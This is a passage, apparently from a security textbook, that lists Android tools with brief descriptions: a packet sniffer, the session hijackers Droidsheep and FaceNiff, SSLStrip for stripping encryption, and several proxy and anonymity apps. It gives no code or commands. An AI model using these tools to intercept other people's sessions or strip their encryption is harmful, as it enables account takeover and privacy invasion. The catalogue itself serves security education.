Shark for Root, by Elviss Kuštans, is essentially a scaled-down version of Wireshark for Android.
Session Hijacking Tools
Droidsheep, by Andrew Koch, works as a session hijacker for nonencrypted sites and allows you to save cookies, files, and sessions for later analysis.
FaceNiff is an Android app that allows you to sniff and intercept web session profiles over Wi-Fi networks.
SSLStrip, by NotExists, is an app used to target SSL-enabled sessions and strips off the protective SSL layer allowing for viewing of protected data.
SandroProxy an Android app used to route traffic through a preselected proxy to allow for covering up of obfuscating attacks.
Psiphon is not really a proxy tool but a VPN technology that can be used to protect traffic to and from a mobile device.
Orbot is a free proxy app that empowers other apps to use the Internet more securely.
Orweb is a browser specifically designed to work with Orbot and is free.
Incognito is a web browser built for private browsing.